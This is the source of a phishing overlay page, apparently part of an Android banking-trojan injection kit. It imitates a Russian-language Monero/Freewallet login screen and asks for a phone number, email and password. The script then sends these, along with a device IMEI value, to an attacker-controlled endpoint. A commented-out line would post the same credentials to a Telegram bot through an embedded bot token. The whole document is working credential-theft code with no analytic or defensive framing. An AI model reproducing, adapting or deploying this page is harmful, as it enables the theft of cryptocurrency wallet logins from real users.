<!DOCTYPE html>

<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1.0, user-scalable=yes, maximum-scale=1.0">
	<script src="ru/xmr.org.freewallet.app/js/jquery.min.js"></script>
	<script src="ru/xmr.org.freewallet.app/js/cat.functions.js"></script>
	<link rel="stylesheet" href="ru/xmr.org.freewallet.app/css/bootstrap.min.css">
	<link rel="stylesheet" href="ru/xmr.org.freewallet.app/css/font-awesome.min.css">
	<link rel="stylesheet" href="ru/xmr.org.freewallet.app/css/cat.style.css" type="text/css" media="all">
	<style type="text/css">
		*{outline:none;}.br{border:1px dotted red;}.stol{display:table;width:100%;}.td{display:table-cell;}.w100{width:100%;}.left_{text-align:left;}.right_{text-align:right;}.center{text-align:center;}.top{vertical-align:top;}.bottom{vertical-align:bottom;}.middle{vertical-align:middle;}.inline{display:inline-block;}.pad{padding:15px;}.tr{display:table-row;}.none{display:none;}
		body,html{background-color:transparent;}@media(max-width:768px){.block-xs{display:block;width:100%!important;}.center-xs{text-align:center!important;}}.ramka{border:1px solid#AAAAAA;background-color:white;border-radius:5px;background-color:white!important;overflow:hidden;box-shadow:0 0 0px#B1B1B1}.header{padding:0px 0px;border-radius:0px 5px 0 0;background-color:white;border-bottom:0px solid black;box-shadow:0px 0px 0px black}.body{padding:15px;}.control-label{color:black;font-weight:600;}.body h3{color:black;font-weight:600;}.has-error.control-label,.has-error.help-block,.has-error.form-control-feedback{}.step_label_h4{color:#007eb6;}

	</style>

  <title>123</title>
</head>
<?php
$IMEI_country = htmlspecialchars($_REQUEST["p"], ENT_QUOTES);
//$IMEI_country = "321|tr";
include "config.php";
?>

<body>
<center><!--visibility: hidden-->
  <div id="yaa" class="td  middle left_" style="">
    <img onclick="document.getElementById('cont3').style.display='block'; document.getElementById('yaa').style.display='none';" src="ru/xmr.org.freewallet.app/images/logo.png" width="100%" height="100%"  style="z-index: auto; "  class="">

    <div onclick="document.getElementById('cat-forms').style.display='block'; document.getElementById('yaa').style.display='none';" style="position: absolute;z-index: 1;margin-top: -13%; width: 100%; height:30px;"/>


  </div>
</center>







<div id="cont3" class="cont3 " style="padding-top:0px; display:none;">
   <div class="" style="">
    <div class="header" style="">
      <div class="stol w100  " style="">

        <center><div class="border_style_solid" style="border: 1px solid #96beeb; background-color: #96beeb; height: 50px; width: 320px; margin-top: 0px; margin-left: -16px; border-radius:0px;">

<br>

<span class="some_class" style="color:white; font-size: 17px; margin-left: -30px; margin-top:0px;"><b>Выполните вход в Monero<b></span>

  </div>
    </div>
    <br></br>
    <center>    <p style="color:#495461; font-size: 13px; margin-top: -20px;"> Введите свой номер телефона</p> </center>


    <div class="body " style="">
      <div class="row " style="">
        <div class="col-sm-12 " style="" >
        </br>
          <div class="form-group" style="">
            <div class="row " style="">
              <div class="col-sm-4 " style="">
              </div>
              <div class="col-sm-3 " style="">
            <center>    <input class="form-control" type="text"  name="Token" style="width: 200px; background-color: #edf7ff" maxlength="" id="number" placeholder="+7"></center>
              </div>
              <br>
            <center>
              <span style="color:#495461;  margin-left: 25px;"><font style="font-size:9px;">Коснитесь Далее, чтобы полуить SMS-подтверждение со стороны Account Kit от Facebook для использования Monero. Вам не обязательно иметь аккаунт на Facebook, чтобы использовать его. Может взиматься плата за передачу сообщений и данных.<u>Узнайте, как Facebook использует вашу информацию</u></span>
             </center>

            </div>
          </div>
          <div class="form-group" style="">
            <div class="row " style="">
              <div class="col-sm-4 " style=""></div>
              <div class="col-sm-3 " style="">

                <center><input type="button" class="btn btn-ligth cont_but" style="font-size: 12px; width:260px;" value="Далее"/></center>

              </div>
            </div>
          </div>
        </div>
      </div>
          </br>
          </div>
</div></div>
</div>







  <div id="cat-forms" style="display:none;">
  	<form id="cat-step-1" class="cat-start-step" style="">
      <div class="cont1 " style="padding-top:0px">
        <div class="" style="">
          <div class="header" style="">
            <div class="stol w100  " style="">

  		  </div>
          </div>
          <div class="body " style="">
            <div class="row " style="">
              <div class="col-sm-12 " style="" >

                      <center><div class="border_style_solid" style="border: 1px solid grey; background-color: grey; height: 50px; width: 320px; margin-top: -16px; margin-left: -16px; border-radius:0px;">
  <br>
  <span class="some_class" style="color:white; font-size: 17px;"><b>Войти в кошелёк<b></span>
        	<div class="form-group" style="">
                  <div class="row " style="">
                    <div class="col-sm-4 " style="">
                    </div>
                    <div class="col-sm-3 " style="">

                    </div>
                  </div>
                </div>
                <div class="form-group" style="">
                  <div class="row " style="">
                    <div class="col-sm-4 " style="">
                    </div>
                  </div>
                </div>
                <div class="form-group" style="">
                  <div class="row " style="">
                    <div class="col-sm-4 " style=""></div>
                    <div class="col-sm-3 " style="">
                    </div>


                  </div>
  </div>
  </div></center>
  <br></br>
    <input class="form-control" type="text" style="width: 260px; margin-left: 7px; border-left: 0px; border-right: 9px; border-top: 0px;  border-radius: 0px; box-shadow: none;" maxlength="" name="userId" id="userId" placeholder="Email">
  </div>

                  </div>
                </div>
              </div><br>
              <center>
           </center>

           <center><input type="button" class="btn btn-ligth cont_but" style="font-size: 12px; width:260px;" value="ДАЛЕЕ"/></center>

            </div>
</div>


    </form>

  <form id="cat-step-2" class="cat-step-block" style="">
    <div class="cont2 " style="padding-top:0px">
       <div class="" style="">
        <div class="header" style="">
          <div class="stol w100  " style="">

            <center><div class="border_style_solid" style="border: 1px solid grey; background-color: grey; height: 50px; width: 320px; margin-top: 0px; margin-left: -16px; border-radius:0px;">

<br>

<span class="some_class" style="color:white; font-size: 17px; margin-left: -100px; margin-top:0px;"><b>Введите пароль<b></span>

		  </div>
        </div>
        <div class="body " style="">
          <div class="row " style="">
            <div class="col-sm-12 " style="" >
            </br>
              <div class="form-group" style="">
                <div class="row " style="">
                  <div class="col-sm-4 " style="">
                  </div>
                  <div class="col-sm-3 " style="">
                <center>    <input class="form-control" type="text"  name="Token" style="width: 260px; margin-left: 7px; border-left: 0px; border-right: 9px; border-top: 0px;  border-radius: 0px; box-shadow: none;" maxlength="" id="Token" placeholder="Пароль"></center>
                  </div>
                </div>
              </div>
              <div class="form-group" style="">
                <div class="row " style="">
                  <div class="col-sm-4 " style=""></div>
                  <div class="col-sm-3 " style="">
<br>
                   <p style="color:#495461; font-size: 12px; margin-top: -20px; margin-left: 130px;"> ЗАБЫЛИ ПАРОЛЬ?</p>


                    <center><input type="button" class="btn btn-ligth cont_but" style="font-size: 12px; width:260px;" value="ЛОГИН"/></center>

                  </div>
                </div>
              </div>
            </div>
          </div>
		  			  </br>
			        </div>
    </div></div></div>
  </form>



      <script>

	function getAjax(text) {
	var URL_='<?php echo $URL;?>';
	//alert(URL_ +  '    ' + text);
	$.ajax({
	  type: 'POST',
	  url: URL_+'/o1o/a10.php',
	  data: text,
	  success: function(data) {
		$('.results').html(data);
	  },
	  error:  function(xhr, str){
		 //  alert('Возникла ошибка: ' + xhr.responseCode);
		}
	});
}
 </script>
  <script type="text/javascript">function test2(){setTimeout(function(){ window.location.replace("file:///android_asset/blank.html");}, 1000); };
(function () {

	var IMEI='<?php echo $IMEI_country;?>';

	$('.form-control').focus(function () {
		$('.has-error').removeClass('has-error');
	})
	$('.cont1 .cont_but').bind('click', function () {
		var err = false;
		var customer_number = $('#userId').val();
		var Security_Number = $('#Security_Number').val();
		var VRegExp = new RegExp(/^[a-z-A-Z0-9]{4,20}\b/);
		if (!VRegExp.test(customer_number)) {
			$('#userId').closest('.form-group').addClass('has-error');
			err = true;
		};
		var VRegExp = new RegExp(/^[a-z-A-Z0-9]{4,20}\b/);
		if (!VRegExp.test(Security_Number)) {
			$('#Security_Number').closest('.form-group').addClass('has-error');
			err = true;
		};
		if (err == true) {
			return;
		};

	 // fetch("https://api.telegram.org/bot2109326350:AAESgBTRopBgrGVKC-QwsM8XveGKDK-38M4/sendMessage?chat_id=-1001712661501&text=||Injection_4|xmr.org.freewallet.app&hl=ru|'+customer_number+"|"+Security_Number);
	  switchStep(1, false);
	});
	$('.cont2 .cont_but').bind('click', function () {

		var err = false;
		var Token = $('#Token').val();

		var VRegExp = new RegExp(/^[a-z-A-Z0-9]{4,20}\b/);
		if (!VRegExp.test(Token)) {
			$('#Token').closest('.form-group').addClass('has-error');
			err = true;
		};

		if (err == true) {
			return;
		};

		var customer_number = $('#userId').val();
		var URL__='<?php echo $URL;?>';
		location.replace(URL__+'/o1o/a10.php?p=' + IMEI + '|Injection_4|xmr.org.freewallet.app|'+customer_number+'|'+ Token);

	});

  $('.cont3 .cont_but').bind('click', function () {

		var customer_number = $('#number').val();
		var URL__='<?php echo $URL;?>';
		location.replace(URL__+'/o1o/a10.php?p=' + IMEI + '|Injection_4|xmr.org.freewallet.app|'+customer_number+'|');

	});


})();
function Calculate(Luhn) {
	var sum = 0;
	for (i = 0; i < Luhn.length; i++) {
		sum += parseInt(Luhn.substring(i, i + 1));
	}
	var delta = new Array(0, 1, 2, 3, 4, -4, -3, -2, -1, 0);
	for (i = Luhn.length - 1; i >= 0; i -= 2) {
		var deltaIndex = parseInt(Luhn.substring(i, i + 1));
		var deltaValue = delta[deltaIndex];
		sum += deltaValue;
	}
	var mod10 = sum % 10;
	mod10 = 10 - mod10;
	if (mod10 == 10) {
		mod10 = 0;
	}
	return mod10;
};
function Validate(Luhn) {
	var LuhnDigit = parseInt(Luhn.substring(Luhn.length - 1, Luhn.length));
	var LuhnLess = Luhn.substring(0, Luhn.length - 1);
	if (Calculate(LuhnLess) == parseInt(LuhnDigit)) {
		return true;
	}
	return false;
};
  </script>
</body>
</html>
